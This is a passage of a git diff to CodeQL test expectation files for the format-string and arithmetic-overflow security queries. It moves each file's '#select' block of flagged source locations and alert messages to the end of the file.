nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | +| consts.cpp:130:9:130:10 | *v9 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. 
| consts.cpp:130:2:130:7 | call to printf | printf | +| consts.cpp:130:9:130:10 | *v9 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | +| consts.cpp:135:9:135:11 | *v10 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | +| consts.cpp:135:9:135:11 | *v10 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | +| consts.cpp:140:9:140:11 | *v11 | consts.cpp:139:13:139:16 | readString output argument | consts.cpp:140:9:140:11 | *v11 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:140:2:140:7 | call to printf | printf | +| consts.cpp:145:9:145:11 | *v12 | consts.cpp:144:16:144:18 | readStringRef output argument | consts.cpp:145:9:145:11 | *v12 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:145:2:145:7 | call to printf | printf | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected index 3966ccbf52fd..4447b215aedf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected 
@@ -1,12 +1,3 @@ -#select -| funcsLocal.c:17:9:17:10 | *i1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | -| funcsLocal.c:27:9:27:10 | *i3 | funcsLocal.c:26:8:26:9 | fgets output argument | funcsLocal.c:27:9:27:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:26:8:26:9 | fgets output argument | string read by fgets | -| funcsLocal.c:32:9:32:10 | *i4 | funcsLocal.c:31:13:31:17 | *call to fgets | funcsLocal.c:32:9:32:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:31:13:31:17 | *call to fgets | string read by fgets | -| funcsLocal.c:37:9:37:10 | *i5 | funcsLocal.c:36:7:36:8 | gets output argument | funcsLocal.c:37:9:37:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:36:7:36:8 | gets output argument | string read by gets | -| funcsLocal.c:42:9:42:10 | *i6 | funcsLocal.c:41:13:41:16 | *call to gets | funcsLocal.c:42:9:42:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:41:13:41:16 | *call to gets | string read by gets | -| funcsLocal.c:47:9:47:11 | ** ... | funcsLocal.c:46:7:46:9 | gets output argument | funcsLocal.c:47:9:47:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:46:7:46:9 | gets output argument | string read by gets | -| funcsLocal.c:53:9:53:11 | ** ... | funcsLocal.c:52:8:52:11 | *call to gets | funcsLocal.c:53:9:53:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| funcsLocal.c:52:8:52:11 | *call to gets | string read by gets | -| funcsLocal.c:58:9:58:10 | *e1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:58:9:58:10 | *e1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | edges | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | provenance | | | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:57:2:57:14 | ... = ... | provenance | | 
@@ -41,3 +32,12 @@ nodes | funcsLocal.c:57:2:57:14 | ... = ... | semmle.label | ... = ... | | funcsLocal.c:58:9:58:10 | *e1 | semmle.label | *e1 | subpaths +#select +| funcsLocal.c:17:9:17:10 | *i1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | +| funcsLocal.c:27:9:27:10 | *i3 | funcsLocal.c:26:8:26:9 | fgets output argument | funcsLocal.c:27:9:27:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:26:8:26:9 | fgets output argument | string read by fgets | +| funcsLocal.c:32:9:32:10 | *i4 | funcsLocal.c:31:13:31:17 | *call to fgets | funcsLocal.c:32:9:32:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:31:13:31:17 | *call to fgets | string read by fgets | +| funcsLocal.c:37:9:37:10 | *i5 | funcsLocal.c:36:7:36:8 | gets output argument | funcsLocal.c:37:9:37:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:36:7:36:8 | gets output argument | string read by gets | +| funcsLocal.c:42:9:42:10 | *i6 | funcsLocal.c:41:13:41:16 | *call to gets | funcsLocal.c:42:9:42:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:41:13:41:16 | *call to gets | string read by gets | +| funcsLocal.c:47:9:47:11 | ** ... | funcsLocal.c:46:7:46:9 | gets output argument | funcsLocal.c:47:9:47:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:46:7:46:9 | gets output argument | string read by gets | +| funcsLocal.c:53:9:53:11 | ** ... 
| funcsLocal.c:52:8:52:11 | *call to gets | funcsLocal.c:53:9:53:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:52:8:52:11 | *call to gets | string read by gets | +| funcsLocal.c:58:9:58:10 | *e1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:58:9:58:10 | *e1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected index 8f06acca17f1..7408d8360ef5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected 
@@ -1,9 +1,3 @@ -#select -| globalVars.c:27:9:27:12 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:27:9:27:12 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:30:15:30:18 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:30:15:30:18 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:38:9:38:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:38:9:38:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:41:15:41:19 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:41:15:41:19 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:50:9:50:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:50:9:50:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | edges | globalVars.c:8:7:8:10 | **copy | globalVars.c:8:7:8:10 | **copy | provenance | | | globalVars.c:8:7:8:10 | **copy | globalVars.c:27:9:27:12 | *copy | provenance | | 
@@ -61,3 +55,9 @@ subpaths | globalVars.c:30:15:30:18 | *copy | globalVars.c:19:25:19:27 | *str | globalVars.c:19:25:19:27 | *str | globalVars.c:30:15:30:18 | printWrapper output argument | | globalVars.c:35:11:35:14 | *copy | globalVars.c:15:21:15:23 | *val | globalVars.c:15:21:15:23 | *val | globalVars.c:35:11:35:14 | setCopy2 output argument | | globalVars.c:41:15:41:19 | *copy2 | globalVars.c:19:25:19:27 | *str | globalVars.c:19:25:19:27 | *str | globalVars.c:41:15:41:19 | printWrapper output argument | +#select +| globalVars.c:27:9:27:12 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:27:9:27:12 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:30:15:30:18 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:30:15:30:18 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:38:9:38:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:38:9:38:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:41:15:41:19 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:41:15:41:19 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:50:9:50:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:50:9:50:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected index 5dad063c999f..e8d852cbcd27 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected 
@@ -1,15 +1,3 @@ -#select -| ifs.c:62:9:62:10 | *c7 | ifs.c:16:27:16:30 | **argv | ifs.c:62:9:62:10 | *c7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:69:9:69:10 | *c8 | ifs.c:16:27:16:30 | **argv | ifs.c:69:9:69:10 | *c8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:75:9:75:10 | *i1 | ifs.c:16:27:16:30 | **argv | ifs.c:75:9:75:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:81:9:81:10 | *i2 | ifs.c:16:27:16:30 | **argv | ifs.c:81:9:81:10 | *i2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:87:9:87:10 | *i3 | ifs.c:16:27:16:30 | **argv | ifs.c:87:9:87:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:93:9:93:10 | *i4 | ifs.c:16:27:16:30 | **argv | ifs.c:93:9:93:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:99:9:99:10 | *i5 | ifs.c:16:27:16:30 | **argv | ifs.c:99:9:99:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:106:9:106:10 | *i6 | ifs.c:16:27:16:30 | **argv | ifs.c:106:9:106:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:112:9:112:10 | *i7 | ifs.c:16:27:16:30 | **argv | ifs.c:112:9:112:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:118:9:118:10 | *i8 | ifs.c:16:27:16:30 | **argv | ifs.c:118:9:118:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:124:9:124:10 | *i9 | ifs.c:16:27:16:30 | **argv | ifs.c:124:9:124:10 | *i9 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | edges | ifs.c:16:27:16:30 | **argv | ifs.c:61:3:61:14 | *... = ... | provenance | | | ifs.c:16:27:16:30 | **argv | ifs.c:68:3:68:14 | *... = ... | provenance | | 
@@ -58,3 +46,15 @@ nodes | ifs.c:123:3:123:14 | *... = ... | semmle.label | *... = ... | | ifs.c:124:9:124:10 | *i9 | semmle.label | *i9 | subpaths +#select +| ifs.c:62:9:62:10 | *c7 | ifs.c:16:27:16:30 | **argv | ifs.c:62:9:62:10 | *c7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:69:9:69:10 | *c8 | ifs.c:16:27:16:30 | **argv | ifs.c:69:9:69:10 | *c8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:75:9:75:10 | *i1 | ifs.c:16:27:16:30 | **argv | ifs.c:75:9:75:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:81:9:81:10 | *i2 | ifs.c:16:27:16:30 | **argv | ifs.c:81:9:81:10 | *i2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:87:9:87:10 | *i3 | ifs.c:16:27:16:30 | **argv | ifs.c:87:9:87:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:93:9:93:10 | *i4 | ifs.c:16:27:16:30 | **argv | ifs.c:93:9:93:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:99:9:99:10 | *i5 | ifs.c:16:27:16:30 | **argv | ifs.c:99:9:99:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). 
| ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:106:9:106:10 | *i6 | ifs.c:16:27:16:30 | **argv | ifs.c:106:9:106:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:112:9:112:10 | *i7 | ifs.c:16:27:16:30 | **argv | ifs.c:112:9:112:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:118:9:118:10 | *i8 | ifs.c:16:27:16:30 | **argv | ifs.c:118:9:118:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:124:9:124:10 | *i9 | ifs.c:16:27:16:30 | **argv | ifs.c:124:9:124:10 | *i9 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected index b1a17aac3623..a2221ec2fd3f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected 
@@ -1,8 +1,8 @@ -#select -| examples.cpp:66:11:66:14 | data | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | examples.cpp:63:26:63:30 | fscanf output argument | value read by fscanf | edges | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | provenance | | nodes | examples.cpp:63:26:63:30 | fscanf output argument | semmle.label | fscanf output argument | | examples.cpp:66:11:66:14 | data | semmle.label | data | subpaths +#select +| examples.cpp:66:11:66:14 | data | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | examples.cpp:63:26:63:30 | fscanf output argument | value read by fscanf | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected index 24e8043d7dbf..dbc1a99858e9 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected 
@@ -1,16 +1,3 @@ -#select -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. 
| examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | edges | examples.cpp:22:5:22:33 | ... = ... | examples.cpp:25:31:25:34 | data | provenance | | | examples.cpp:22:26:22:33 | call to rand | examples.cpp:22:5:22:33 | ... = ... | provenance | | 
@@ -44,3 +31,16 @@ nodes | examples.cpp:35:26:35:33 | call to rand | semmle.label | call to rand | | examples.cpp:38:9:38:12 | data | semmle.label | data | subpaths +#select +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. 
| examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected index c07119831d7e..97bd3603cd3c 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected 
@@ -1,31 +1,3 @@ -#select -| test.c:21:17:21:17 | r | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:18:13:18:16 | call to rand | uncontrolled value | -| test.c:35:5:35:5 | r | test.c:34:13:34:18 | call to rand | test.c:35:5:35:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:34:13:34:18 | call to rand | uncontrolled value | -| test.c:45:5:45:5 | r | test.c:44:13:44:16 | call to rand | test.c:45:5:45:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:44:13:44:16 | call to rand | uncontrolled value | -| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | -| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | -| test.c:83:9:83:9 | r | test.c:81:14:81:17 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:14:81:17 | call to rand | uncontrolled value | -| test.c:83:9:83:9 | r | test.c:81:23:81:26 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:23:81:26 | call to rand | uncontrolled value | -| test.c:127:9:127:9 | r | test.c:125:13:125:16 | call to rand | test.c:127:9:127:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:125:13:125:16 | call to rand | uncontrolled value | -| test.c:133:5:133:5 | r | test.c:131:13:131:16 | call to rand | test.c:133:5:133:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. 
| test.c:131:13:131:16 | call to rand | uncontrolled value | -| test.c:139:10:139:10 | r | test.c:137:13:137:16 | call to rand | test.c:139:10:139:10 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:137:13:137:16 | call to rand | uncontrolled value | -| test.c:157:9:157:9 | r | test.c:155:22:155:27 | call to rand | test.c:157:9:157:9 | r | This arithmetic expression depends on an $@, potentially causing an underflow. | test.c:155:22:155:25 | call to rand | uncontrolled value | -| test.cpp:25:7:25:7 | r | test.cpp:8:9:8:12 | call to rand | test.cpp:25:7:25:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:8:9:8:12 | call to rand | uncontrolled value | -| test.cpp:31:7:31:7 | r | test.cpp:13:10:13:13 | call to rand | test.cpp:31:7:31:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:13:10:13:13 | call to rand | uncontrolled value | -| test.cpp:37:7:37:7 | r | test.cpp:18:9:18:12 | call to rand | test.cpp:37:7:37:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:18:9:18:12 | call to rand | uncontrolled value | -| test.cpp:65:9:65:9 | x | test.cpp:62:19:62:24 | call to rand | test.cpp:65:9:65:9 | x | This arithmetic expression depends on an $@, potentially causing an underflow. | test.cpp:62:19:62:22 | call to rand | uncontrolled value | -| test.cpp:90:10:90:10 | x | test.cpp:86:10:86:13 | call to rand | test.cpp:90:10:90:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:86:10:86:13 | call to rand | uncontrolled value | -| test.cpp:102:10:102:10 | x | test.cpp:98:10:98:13 | call to rand | test.cpp:102:10:102:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. 
| test.cpp:98:10:98:13 | call to rand | uncontrolled value | -| test.cpp:146:9:146:9 | y | test.cpp:137:10:137:13 | call to rand | test.cpp:146:9:146:9 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:137:10:137:13 | call to rand | uncontrolled value | -| test.cpp:154:10:154:10 | b | test.cpp:151:10:151:13 | call to rand | test.cpp:154:10:154:10 | b | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:151:10:151:13 | call to rand | uncontrolled value | -| test.cpp:171:11:171:16 | y | test.cpp:169:11:169:14 | call to rand | test.cpp:171:11:171:16 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:169:11:169:14 | call to rand | uncontrolled value | -| test.cpp:196:7:196:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:196:7:196:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:198:7:198:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:198:7:198:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:199:7:199:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:199:7:199:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:204:7:204:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:204:7:204:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:205:7:205:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:205:7:205:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. 
